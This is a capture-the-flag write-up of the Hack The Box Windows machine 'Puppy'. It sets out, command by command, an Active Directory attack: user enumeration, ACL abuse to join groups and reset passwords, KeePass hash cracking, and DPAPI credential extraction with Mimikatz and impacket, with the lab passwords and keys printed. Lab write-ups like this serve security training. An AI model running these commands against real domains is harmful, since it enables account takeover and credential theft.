Puppy

September 27, 2025

---

Created by	Page	Difficulty	OS
tr3nb0lone	Hack The Box	Medium	Windows

---

Enumeration

• I began with a full TCP port scan, followed by a service and version detection scan on the discovered open ports

   nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.11.70 -oG scan
   /opt/extractports scan
   nmap -p53,88,111,135,139,389,445,464,593,636,2049,3260,3268,3269,5985,9389,49664,49667,49669,49670,53473,53482,53497 -Pn -sCV 10.10.11.70 -oN ports
  

  

• Port 53 was open, so I performed a DNS query to enumerate mail servers, which revealed an additional domain to add to /etc/hosts:

    dig @10.10.11.70 PUPPY.HTB mx
  

  

• HTB provided the initial credentials:
  levi.james : KingofAkron2025!

• Using these, I connected via rpcclient to enumerate domain users:

    rpcclient -U 'levi.james' 10.10.11.70 
        enumdomusers
  

  

• I filtered the valid users with kerbrute:

    /opt/kerbrute userenum -d PUPPY.HTB  --dc 10.10.11.70  /home/rufo/usernames 
  

  

• Then I used ldapdomaindump to gather more structured information about users and groups:

    ldapdomaindump -u 'PUPPY.HTB\levi.james' -p 'KingofAkron2025!' 10.10.11.70 
  

• The user adam.silver stood out, as the account was disabled:

  

• Members of the RMU group included steph.cooper and adam.silver, suggesting they might be interesting targets:

  

• Unusual groups like Developers and Senior Devs were also present:

  

Privilege Enumeration & Abuse

• Using bloodhound-python, I collected data to analyze potential privilege escalation paths:

    bloodhound-python -c all -u 'levi.james' -p 'KingofAkron2025!' -ns 10.10.11.70 -d PUPPY.HTB
  

• The user levi.james was a member of the HR group, which had GenericWrite permissions over the Developers group. This allowed us to add ourselves to it:

    net rpc group addmem "DEVELOPERS" "levi.james" -U "PUPPY.HTB"/"levi.james"%'KingofAkron2025!' -S "dc.PUPPY.HTB"
    net rpc group members "DEVELOPERS" -U "PUPPY.HTB"/"levi.james"%'KingofAkron2025!' -S "dc.PUPPY.HTB"
  

  

• Now part of the Developers group, we had read access to the previously restricted DEV share:

    netexec smb 10.10.11.70 -u usernames -p passwords --shares
  

  

• Inside, we found a KeePass database file: recovery.kdbx. To open it, we needed the master password:

    smbclient -U 'levi.james' //10.10.11.70/DEV       
  

  

• Initially, keepass2john failed due to version incompatibility, but after downloading the latest version from GitHub, I extracted the hash and cracked it using rockyou.txt

    john --wordlist=/usr/share/wordlists/rockyou.txt /home/rufo/content/hashKeepass 
  

  

• The database contained several credentials. After testing them, I found valid credentials for ant.edwards

  

Lateral Movement

• According to BloodHound, ant.edwards (a member of Senior Devs) had GenericAll rights over adam.silver. This allowed a password reset:

    net rpc password "adam.silver" -U "PUPPY.HTTB"/"ant.edwards"%'Antman2025!' -S 10.10.11.70
  

• Despite the reset, the account was still disabled. Using bloodyAD, I re-enabled the account:

    bloodyAD --host dc.PUPPY.HTB -d PUPPY.HTB -u ant.edwards -p 'Antman2025!' remove uac adam.silver -f ACCOUNTDISABLE
    evil-winrm -i 10.10.11.70 -u  "adam.silver" -p 'PePe1234.-!asdf' 
  

  

• Once logged in, I obtained the user flag.

Privilege Escalation

• Exploring the system, I found a folder C:\Backups containing a zip archive: site-backup-2024-12-30.zip. It included plaintext credentials for steph.cooper:

  

• After verifying the credentials:

    netexec smb 10.10.11.70 -u steph.cooper -p ChefSteph2025!
    netexec winrm 10.10.11.70 -u steph.cooper -p ChefSteph2025!
    evil-winrm -i 10.10.11.70 -u steph.cooper -p ChefSteph2025!
  

• There were two remaining domain admin accounts. After checking the file system with no success, I ran WinPEAS, which identified DPAPI credential files.

  

Method 1: Extracting Credentials with Mimikatz

• I retrieved the user SID and listed hidden files:

    Get-LocalUser | Select-Object Name,SID
    Get-ChildItem -Force
  

• Then used Mimikatz to dump the masterkey:

    .\mimikatz.exe "dpapi::masterkey /in:C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407 /rpc" exit
  

• With the masterkey, I decrypted the DPAPI credential file:

    .\mimikatz.exe "dpapi::cred /in:C:\Users\steph.cooper\appdata\roaming\microsoft\credentials\C8D69EBE9A43E9DEBF6B5FBD48B521B9 /masterkey:d9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84" exit
  

  

• This revealed credentials for steph.cooper_adm, which granted access via WinRM:

    evil-winrm -i 10.10.11.70 -u steph.cooper_adm -p FivethChipOnItsWay2025!
  

  

Method 2: Offline DPAPI Decryption with Impacket

• Following resources from The Hacker Recipes and Ben Heater’s Notes, I tried an offline approach.

• First, I dumped the masterkey:

    impacket-dpapi masterkey -f ./556a2412-1275-4ccf-b721-e6a0b4f90407 -sid S-1-5-21-1487982659-1829050783-2281216199-1107 -password 'ChefSteph2025!'
  

• Then used the key to decrypt the credential blob:

    impacket-dpapi credential  -f ./C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key "0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84"